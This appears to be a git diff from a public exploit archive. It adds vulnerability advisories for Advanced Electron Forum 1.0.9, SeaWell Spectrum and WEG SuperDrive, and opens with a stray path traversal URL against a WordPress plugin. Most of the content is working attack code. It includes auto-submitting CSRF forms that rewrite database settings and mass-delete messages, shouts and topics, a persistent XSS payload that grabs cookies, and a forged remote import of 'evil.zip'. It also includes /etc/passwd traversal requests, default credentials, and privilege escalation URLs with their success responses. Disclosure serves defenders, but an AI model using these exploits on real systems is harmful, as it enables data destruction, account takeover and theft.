|
||||
http://www.example.com/wp_test/wp-content/plugins/tera-charts/charts/zoomabletreemap.php?fn=../../../../../etc/passwd
|
180
platforms/php/webapps/39261.txt
Executable file
180
platforms/php/webapps/39261.txt
Executable file
|
@ -0,0 +1,180 @@
|
|||
[+] Credits: hyp3rlinx
|
||||
|
||||
[+] Website: hyp3rlinx.altervista.org
|
||||
|
||||
[+] Source: http://hyp3rlinx.altervista.org/advisories/AEF-CSRF.txt
|
||||
|
||||
|
||||
Vendor:
|
||||
=============================
|
||||
www.anelectron.com/downloads/
|
||||
|
||||
|
||||
Product:
|
||||
====================================
|
||||
Advanced Electron Forum v1.0.9 (AEF)
|
||||
Exploit patched current version.
|
||||
|
||||
|
||||
Vulnerability Type:
|
||||
===================
|
||||
CSRF
|
||||
|
||||
|
||||
CVE Reference:
|
||||
==============
|
||||
N/A
|
||||
|
||||
|
||||
Vulnerability Details:
|
||||
=====================
|
||||
|
||||
In Admin panel no CSRF protections exist in multiple areas allowing remote
|
||||
attackers to make HTTP request on behalf of the victim if they
|
||||
currently have a valid session (logged in) and visit or click an infected
|
||||
link, resulting in some of the following destructions.
|
||||
|
||||
0x01: Change current database settings
|
||||
|
||||
0x02: Delete all Inbox / Sent Emails
|
||||
|
||||
0x03: Delete all 'shouts'
|
||||
|
||||
0x04: Delete all Topics
|
||||
|
||||
by the way, edit profile, avatar and more all seem vulnerable as well..
|
||||
|
||||
|
||||
Exploit code(s):
|
||||
===============
|
||||
|
||||
CSRF 0x01:
|
||||
|
||||
change mysql db settings
|
||||
note: however you will need to know or guess the database name.
|
||||
|
||||
<form id="DOOM" accept-charset="ISO-8859-1" action="
|
||||
http://localhost/AEF(1.0.9)_Install/index.php?act=admin&adact=conpan&seadact=mysqlset"
|
||||
method="post" name="mysqlsetform">
|
||||
<input type="hidden" name="server" value="hyp3rlinx.altervista.org" />
|
||||
<input type="hidden" name="user" value="hyp3rlinx" />
|
||||
<input type="hidden" name="password" value="DESTROYED" />
|
||||
<input type="hidden" name="database" value="AEF" />
|
||||
<input type="hidden" name="dbprefix" value="aef_" />
|
||||
<script>document.getElementById('DOOM').submit()</script>
|
||||
</form>
|
||||
|
||||
|
||||
CSRF 0x02:
|
||||
|
||||
Delete all Inbox / Sent emails...
|
||||
|
||||
<iframe name="demonz" style="display:none" name="hidden-form"></iframe>
|
||||
|
||||
<form id="DESTRUCT" target="demonz" action="
|
||||
http://localhost/AEF(1.0.9)_Install/index.php?act=usercp&ucpact=sentitems"
|
||||
method="post">
|
||||
<input type="hidden" id="sent" name="list[]" />
|
||||
<input type="hidden" name="deleteselsent" value="Delete+Selected" />
|
||||
</form>
|
||||
|
||||
<form id="DOOM" target="demonz" action="
|
||||
http://localhost/AEF(1.0.9)_Install/index.php?act=usercp&ucpact=inbox"
|
||||
method="post">
|
||||
<input type="hidden" id="inbox" name="list[]" />
|
||||
<input type="hidden" name="deleteselinbox" value="Delete+Selected" />
|
||||
</form>
|
||||
|
||||
<script>
|
||||
//Sent Email IDs seem to be stored using even numbers 2,4,6 etc...
|
||||
//Inbox Email IDs seem to use odd numbers
|
||||
var c=-1
|
||||
var uwillsuffer;
|
||||
var amttodelete=10000
|
||||
var inbox=document.getElementById("inbox")
|
||||
var outbox=document.getElementById("sent")
|
||||
|
||||
function RUIN_EVERYTHING(){
|
||||
c++
|
||||
//Inbox IDs are even numbered Sent are odd.
|
||||
if(c % 2 == 0){
|
||||
arguments[3].value=c
|
||||
document.getElementById(arguments[1]).submit()
|
||||
}else{
|
||||
arguments[2].value=c
|
||||
document.getElementById(arguments[0]).submit()
|
||||
}
|
||||
if(c>=amttodelete){
|
||||
clearInterval(uwillsuffer)
|
||||
alert("Done!")
|
||||
}
|
||||
}
|
||||
uwillsuffer = setInterval(RUIN_EVERYTHING, 1000, "DOOM", "DESTRUCT", inbox,
|
||||
outbox)
|
||||
</script>
|
||||
|
||||
|
||||
|
||||
CSRF 0x03:
|
||||
|
||||
Delete all 'Shouts'
|
||||
|
||||
<form accept-charset="ISO-8859-1" id="SPECTOR_OF_HATE" action="
|
||||
http://localhost/AEF(1.0.9)_Install/index.php?act=admin&adact=conpan&seadact=shoutboxset"
|
||||
method="post">
|
||||
<input type="hidden" name="shouts" value="10" />
|
||||
<input type="hidden" name="shoutboxtime" value="1440" />
|
||||
<input type="hidden" name="shoutbox_emot" value="on" />
|
||||
<input type="hidden" name="shoutbox_nbbc" value="on" />
|
||||
<input type="hidden" name="truncatetable" value="on" />
|
||||
<input type="hidden" name="delallshouts" value="Delete" />
|
||||
<script>document.getElementById('SPECTOR_OF_HATE').submit()</script>
|
||||
</form>
|
||||
|
||||
|
||||
CSRF 0x04:
|
||||
|
||||
Delete all 'Topics' via simple GET request, this will delete topics 1 thru
|
||||
7...
|
||||
|
||||
http://localhost/AEF(1.0.9)_Install/index.php?act=deletetopic&topid=7,6,5,4,3,2,1
|
||||
|
||||
|
||||
Disclosure Timeline:
|
||||
=======================================
|
||||
Vendor Notification: NA
|
||||
January 17, 2016 : Public Disclosure
|
||||
|
||||
|
||||
|
||||
Exploitation Technique:
|
||||
======================
|
||||
Remote
|
||||
|
||||
|
||||
Severity Level:
|
||||
================
|
||||
High
|
||||
|
||||
|
||||
Description:
|
||||
===================================================================
|
||||
Request Method(s): [+] POST / GET
|
||||
|
||||
|
||||
Vulnerable Product: [+] AEF v1.0.9 (exploit patched version)
|
||||
|
||||
|
||||
===================================================================
|
||||
|
||||
[+] Disclaimer
|
||||
Permission is hereby granted for the redistribution of this advisory,
|
||||
provided that it is not altered except by reformatting it, and that due
|
||||
credit is given. Permission is explicitly given for insertion in
|
||||
vulnerability databases and similar, provided that due credit is given to
|
||||
the author.
|
||||
The author is not responsible for any misuse of the information contained
|
||||
herein and prohibits any malicious use of all security related information
|
||||
or exploits by the author or elsewhere.
|
||||
|
||||
by hyp3rlinx
|
139
platforms/php/webapps/39262.txt
Executable file
139
platforms/php/webapps/39262.txt
Executable file
|
@ -0,0 +1,139 @@
|
|||
[+] Credits: hyp3rlinx
|
||||
|
||||
[+] Website: hyp3rlinx.altervista.org
|
||||
|
||||
[+] Source: http://hyp3rlinx.altervista.org/advisories/AEF-XSS.txt
|
||||
|
||||
|
||||
Vendor:
|
||||
=============================
|
||||
www.anelectron.com/downloads/
|
||||
|
||||
|
||||
Product:
|
||||
====================================
|
||||
Advanced Electron Forum v1.0.9 (AEF)
|
||||
Exploit patched current version.
|
||||
|
||||
|
||||
Vulnerability Type:
|
||||
===================
|
||||
Persistent XSS
|
||||
|
||||
|
||||
CVE Reference:
|
||||
==============
|
||||
N/A
|
||||
|
||||
|
||||
Vulnerability Details:
|
||||
=====================
|
||||
|
||||
In Admin panel under Edit Boards / General Stuff / General Options
|
||||
|
||||
There is an option to sepcify a redirect URL for the forum.
|
||||
|
||||
See --> Redirect Forum:
|
||||
Enter a URL to which this forum will be redirected to.
|
||||
|
||||
The redirect input field is vulnerable to a persistent XSS that will be
|
||||
stored in the MySQL database
|
||||
and execute attacker supplied client side code each time a victim visits
|
||||
the following URLs.
|
||||
|
||||
http://localhost/AEF(1.0.9)_Install/index.php?
|
||||
|
||||
http://localhost/AEF(1.0.9)_Install/index.php?act=admin&adact=forums&seadact=editforum&editforum=1
|
||||
|
||||
|
||||
|
||||
Exploit code(s):
|
||||
===============
|
||||
|
||||
Persistent XSS
|
||||
|
||||
<form id="XSS-DE-PERSISTO" action="
|
||||
http://localhost/AEF(1.0.9)_Install/index.php?act=admin&adact=forums&seadact=editforum&editforum=1"
|
||||
method="post">
|
||||
<input type="hidden" name="editmother" value="c1" />
|
||||
<input type="hidden" name="forder" value="1" />
|
||||
<input type="hidden" name="fstatus" value="1" />
|
||||
<input type="hidden" name="fredirect" value='"/><script>alert("XSS
|
||||
hyp3rlinx \n\n" + document.cookie)</script>' />
|
||||
<input type="hidden" name="fimage" value="" />
|
||||
<input type="hidden" name="fname" value="Generals" />
|
||||
<input type="hidden" name="fdesc" value="hyp3rlinx" />
|
||||
<input type="hidden" name="ftheme" value="0" />
|
||||
<input type="hidden" name="frulestitle" value="MAYHEM" />
|
||||
<input type="hidden" name="frules" value="0" />
|
||||
<input type="hidden" name="rss" value="10" />
|
||||
<input type="hidden" name="rss_topic" value="0" />
|
||||
<input type="hidden" name="member[-1]" value="on" />
|
||||
<input type="hidden" name="member[0]" value="on" />
|
||||
<input type="hidden" name="member[3]" value="on" />
|
||||
<input type="hidden" name="inc_mem_posts" value="on" />
|
||||
<input type="hidden" name="allow_poll" value="on" />
|
||||
<input type="hidden" name="allow_html" value="on" />
|
||||
<input type="hidden" name="mod_posts" value="on" />
|
||||
<input type="hidden" name="editboard" value="Edit+Forum" />
|
||||
<script>document.getElementById('XSS-DE-PERSISTO').submit()</script>
|
||||
</form>
|
||||
|
||||
|
||||
|
||||
Some other misc XSS(s) under 'Signature' area.
|
||||
|
||||
|
||||
http://localhost/AEF(1.0.9)_Install/index.php?act=usercp&ucpact=signature
|
||||
on Anchor link setting
|
||||
http://"onMouseMove="alert(0)
|
||||
|
||||
AND
|
||||
|
||||
http://localhost/AEF(1.0.9)_Install/index.php?act=usercp&ucpact=writepm
|
||||
email link:
|
||||
mailto:"onMouseMove="alert(1)
|
||||
|
||||
|
||||
|
||||
Disclosure Timeline:
|
||||
=====================================
|
||||
Vendor Notification: NA
|
||||
January 17, 2016 : Public Disclosure
|
||||
|
||||
|
||||
Exploitation Technique:
|
||||
=======================
|
||||
Remote
|
||||
|
||||
|
||||
Severity Level:
|
||||
================
|
||||
High
|
||||
|
||||
|
||||
Description:
|
||||
=================================================================
|
||||
|
||||
|
||||
Request Method(s): [+] POST
|
||||
|
||||
|
||||
Vulnerable Product: [+] AEF v1.0.9 (exploit patched version)
|
||||
|
||||
|
||||
Vulnerable Parameter(s): [+] 'fredirect'
|
||||
|
||||
=================================================================
|
||||
|
||||
[+] Disclaimer
|
||||
Permission is hereby granted for the redistribution of this advisory,
|
||||
provided that it is not altered except by reformatting it, and that due
|
||||
credit is given. Permission is explicitly given for insertion in
|
||||
vulnerability databases and similar, provided that due credit is given to
|
||||
the author.
|
||||
The author is not responsible for any misuse of the information contained
|
||||
herein and prohibits any malicious use of all security related information
|
||||
or exploits by the author or elsewhere.
|
||||
|
||||
by hyp3rlinx
|
113
platforms/php/webapps/39263.txt
Executable file
113
platforms/php/webapps/39263.txt
Executable file
|
@ -0,0 +1,113 @@
|
|||
[+] Credits: hyp3rlinx
|
||||
|
||||
[+] Website: hyp3rlinx.altervista.org
|
||||
|
||||
[+] Source: http://hyp3rlinx.altervista.org/advisories/AEF-RFI.txt
|
||||
|
||||
|
||||
|
||||
Vendor:
|
||||
=============================
|
||||
www.anelectron.com/downloads/
|
||||
|
||||
|
||||
|
||||
Product:
|
||||
================================
|
||||
Advanced Electron Forum v1.0.9 (AEF)
|
||||
Exploit patched current version.
|
||||
|
||||
|
||||
Vulnerability Type:
|
||||
============================
|
||||
Remote File Inclusion / CSRF
|
||||
|
||||
|
||||
|
||||
CVE Reference:
|
||||
==============
|
||||
N/A
|
||||
|
||||
|
||||
|
||||
Vulnerability Details:
|
||||
=====================
|
||||
|
||||
In Admin control panel there is option to Import Skins and one choice is
|
||||
using a web URL.
|
||||
|
||||
From AEF:
|
||||
|
||||
"Specify the URL of the theme on the net. The theme file must be a
|
||||
compressed archive (zip, tgz, tbz2, tar)."
|
||||
|
||||
However there is no CSRF token or check made that this is a valid request
|
||||
made by the currently logged in user, resulting
|
||||
in arbitrary remote file imports from an attacker if the user visits or
|
||||
clicks an malicious link. Victims will then be left
|
||||
open to arbitrary malicious file downloads from anywhere on the net which
|
||||
may be used as a platform for further attacks...
|
||||
|
||||
|
||||
|
||||
Exploit code(s):
|
||||
===============
|
||||
|
||||
<form id="EL-DOWNLOADO" action="
|
||||
http://localhost/AEF(1.0.9)_Install/index.php?act=admin&adact=skin&seadact=import"
|
||||
method="post">
|
||||
<input type="hidden" name="folderpath" value="../" />
|
||||
<input type="hidden" name="importtype" value="2" />
|
||||
<input type="hidden" name="weburl" value="
|
||||
http://hyp3rlinx.altervista.org/evil.zip" />
|
||||
<input type="hidden" name="filepath" value="../" />
|
||||
<input type="hidden" name="uploadtheme" value="" />
|
||||
<input type="hidden" name="importskin" value="Import" />
|
||||
<script>document.getElementById('EL-DOWNLOADO').submit()</script>
|
||||
</form>
|
||||
|
||||
|
||||
|
||||
Disclosure Timeline:
|
||||
======================================
|
||||
Vendor Notification: NA
|
||||
January 17, 2016 : Public Disclosure
|
||||
|
||||
|
||||
|
||||
Exploitation Technique:
|
||||
=======================
|
||||
Remote
|
||||
|
||||
|
||||
|
||||
Severity Level:
|
||||
===============
|
||||
High
|
||||
|
||||
|
||||
|
||||
Description:
|
||||
==================================================================
|
||||
|
||||
|
||||
Request Method(s): [+] POST
|
||||
|
||||
|
||||
Vulnerable Product: [+] Advanced Electron Forum v1.0.9 (AEF)
|
||||
|
||||
|
||||
|
||||
==================================================================
|
||||
|
||||
[+] Disclaimer
|
||||
Permission is hereby granted for the redistribution of this advisory,
|
||||
provided that it is not altered except by reformatting it, and that due
|
||||
credit is given. Permission is explicitly given for insertion in
|
||||
vulnerability databases and similar, provided that due credit is given to
|
||||
the author.
|
||||
The author is not responsible for any misuse of the information contained
|
||||
herein and prohibits any malicious use of all security related information
|
||||
or exploits by the author or elsewhere.
|
||||
|
||||
by hyp3rlinx
|
105
platforms/php/webapps/39266.txt
Executable file
105
platforms/php/webapps/39266.txt
Executable file
|
@ -0,0 +1,105 @@
|
|||
# Exploit Title: [SeaWell Networks Spectrum - Multiple Vulnerabilities]
|
||||
# Discovered by: Karn Ganeshen
|
||||
# Vendor Homepage: [http://www.seawellnetworks.com/spectrum/]
|
||||
# Versions Reported: [Spectrum SDC 02.05.00, Build 02.05.00.0016]
|
||||
|
||||
CVE-ID:
|
||||
CVE-2015-8282
|
||||
CVE-2015-8283
|
||||
CVE-2015-8284
|
||||
|
||||
About SeaWell Networks Spectrum
|
||||
|
||||
Session Delivery Control
|
||||
|
||||
SeaWell set out to improve the way operators control, monetize and scale their IP video offerings, to meet the growing subscriber demands for video delivered to smartphones, tablets and game consoles.
|
||||
|
||||
The result – Spectrum – is what we call a “Multiscreen 2.0” Session Delivery Controller.
|
||||
|
||||
Spectrum is high-performance, carrier-grade software that takes ABR video and repackages it – on-the-fly – into any other protocol, including Apple HLS, Adobe HDS, Microsoft Smooth Streaming and MPEG-DASH.
|
||||
|
||||
http://www.seawellnetworks.com/spectrum/
|
||||
|
||||
Affected version
|
||||
Spectrum SDC 02.05.00
|
||||
Build 02.05.00.0016
|
||||
Copyright (c) 2015 SeaWell Networks Inc.
|
||||
|
||||
A. CWE-255: Credentials Management
|
||||
CVE-2015-8282
|
||||
|
||||
Weak, default login credentials - admin / admin
|
||||
|
||||
B. CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
|
||||
CVE-2015-8283
|
||||
|
||||
The configure_manage.php module accepts a file parameter which takes an unrestricted file path as input, allowing an attacker (non-admin, low- privileged user) to read arbitrary files on the system.
|
||||
|
||||
PoC:
|
||||
|
||||
https://IP/configure_manage.php?action=download_config&file=../../../../../../../../../etc/passwd
|
||||
|
||||
C. CWE-285: Improper Authorization
|
||||
CVE-2015-8284
|
||||
|
||||
A low privileged, non-admin user, with only viewer privileges, can perform administrative functions, such as create, update, delete a user (including admin user), or access device's configuration files (policy.xml, cookie_config.xml, systemCfg.xml). The application lacks Authorization controls to restrict any non-admin users from performing admin functions.
|
||||
|
||||
The application users can have admin or viewer privilege levels. Admin has full access to the device. Viewer has access to very restricted functions.
|
||||
|
||||
It is possible for a viewer priv user to perform admin functions.
|
||||
|
||||
PoC:
|
||||
|
||||
Add new user [Admin function only]
|
||||
|
||||
GET /system_manage.php?username=viewer&password=viewer&password=viewer&userlevel=1&action=add_user&ekey=&LActiveRow= HTTP/1.1
|
||||
|
||||
https://IP/system_manage.php?username=viewer1&password=viewer&password=viewer&userlevel=9&action=add_user&ekey=&LActiveRow=
|
||||
|
||||
Here
|
||||
|
||||
admin -> userlevel=9
|
||||
viewer -> userlevel=1
|
||||
|
||||
Create new user with Admin privs
|
||||
Log in as viewer - try create new admin user - viewer1
|
||||
|
||||
https://IP/system_manage.php?username=viewer1&password=viewer&password=viewer&userlevel=9&action=add_user&ekey=&LActiveRow=
|
||||
|
||||
<result><returnCode>0</returnCode><returnMsg>Success</returnMsg><loggedIn>1</loggedIn><payload/></result>
|
||||
|
||||
Delete user
|
||||
|
||||
https://IP/system_manage.php?username=viewer1&password=&password=&userlevel=9&action=delete_user&ekey=4&LActiveRow=sys_Luser_4
|
||||
|
||||
Modify existing user (including admin)
|
||||
log in as viewer - try change system (admin) user
|
||||
|
||||
https://IP/system_manage.php?username=system&password=&password=&userlevel=9&action=delete_user&ekey=4&LActiveRow=sys_Luser_4
|
||||
|
||||
<result><returnCode>0</returnCode><returnMsg>Success</returnMsg><loggedIn>1</loggedIn><payload/></result>
|
||||
|
||||
Change Admin password
|
||||
log in as viewer - try change admin pass
|
||||
|
||||
https://IP/system_manage.php?username=admin&password=admin1&password=admin1&userlevel=9&action=update_user&ekey=3&LActiveRow=sys_Luser_3
|
||||
|
||||
<result><returnCode>0</returnCode><returnMsg>Success</returnMsg><loggedIn>1</loggedIn><payload/></result>
|
||||
|
||||
Downloading configuration xml files
|
||||
|
||||
viewer priv user has no access/option to config xmls via GUI. It is possible to download the configs by calling the url directly
|
||||
|
||||
Access policy config xml
|
||||
https://IP/configure_manage.php?action=download_config&file=policy.xml
|
||||
|
||||
Access cookie config xml
|
||||
https://IP/configure_manage.php?action=download_config&file=cookie_config.xml
|
||||
|
||||
Access system config xml
|
||||
https://IP/configure_manage.php?action=download_config&file=systemCfg.xml
|
||||
|
||||
+++++
|
||||
--
|
||||
Best Regards,
|
||||
Karn Ganeshen
|
66
platforms/windows/local/39260.txt
Executable file
66
platforms/windows/local/39260.txt
Executable file
|
@ -0,0 +1,66 @@
|
|||
|
||||
WEG SuperDrive G2 v12.0.0 Insecure File Permissions
|
||||
|
||||
|
||||
Vendor: WEG Group
|
||||
Product web page: http://www.weg.net
|
||||
Affected version: SuperDrive G2 (v12.0.0 Build 20150930-J1.8.0_60-NB8.0.2)
|
||||
SuperDrive (v7.0.0)
|
||||
|
||||
Summary: SuperDrive is a Windows graph tool for parameter setting,
|
||||
control and monitor of WEG Drives. It permits to edit directly in the
|
||||
drive online parameters, or to edit offline parameter files stored
|
||||
in the microcomputer. It enables you to store parameters of all drives
|
||||
that exist in the installation. The software also incorporates functions
|
||||
enable the upload to the drive of the microcomputer parameters sets
|
||||
as well as the download from the drive to the microcomputer. The
|
||||
communication between drive and microcomputer is realized via RS232
|
||||
serial interface (point to point) or by RS485 for network linkage.
|
||||
|
||||
Desc: SuperDrive suffers from an elevation of privileges vulnerability
|
||||
which can be used by a simple authenticated user that can change the
|
||||
executable file with a binary of choice. The vulnerability exist due
|
||||
to the improper permissions, with the 'C' flag (Change) for 'Authenticated
|
||||
Users' group.
|
||||
|
||||
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
|
||||
Microsoft Windows 7 Professional SP1 (EN)
|
||||
Java 1.8.0_60
|
||||
|
||||
|
||||
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||
@zeroscience
|
||||
|
||||
|
||||
Advisory ID: ZSL-2016-5294
|
||||
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5294.php
|
||||
|
||||
|
||||
25.11.2015
|
||||
|
||||
--
|
||||
|
||||
|
||||
C:\WEG\SuperDrive 7.0.0>cacls SuperDrive.exe
|
||||
C:\WEG\SuperDrive 7.0.0\SuperDrive.exe BUILTIN\Administrators:F
|
||||
NT AUTHORITY\SYSTEM:F
|
||||
BUILTIN\Users:R
|
||||
NT AUTHORITY\Authenticated Users:C
|
||||
|
||||
|
||||
C:\WEG\SuperDrive 7.0.0>
|
||||
|
||||
|
||||
C:\WEG\SuperDrive G2 12.0.0>cacls *.exe
|
||||
C:\WEG\SuperDrive G2 12.0.0\SuperDriveG2.exe BUILTIN\Administrators:F
|
||||
NT AUTHORITY\SYSTEM:F
|
||||
BUILTIN\Users:R
|
||||
NT AUTHORITY\Authenticated Users:C
|
||||
|
||||
C:\WEG\SuperDrive G2 12.0.0\unins000.exe BUILTIN\Administrators:F
|
||||
NT AUTHORITY\SYSTEM:F
|
||||
BUILTIN\Users:R
|
||||
NT AUTHORITY\Authenticated Users:C
|
||||
|
||||
|
||||
C:\WEG\SuperDrive G2 12.0.0>
|
Loading…
Add table
Reference in a new issue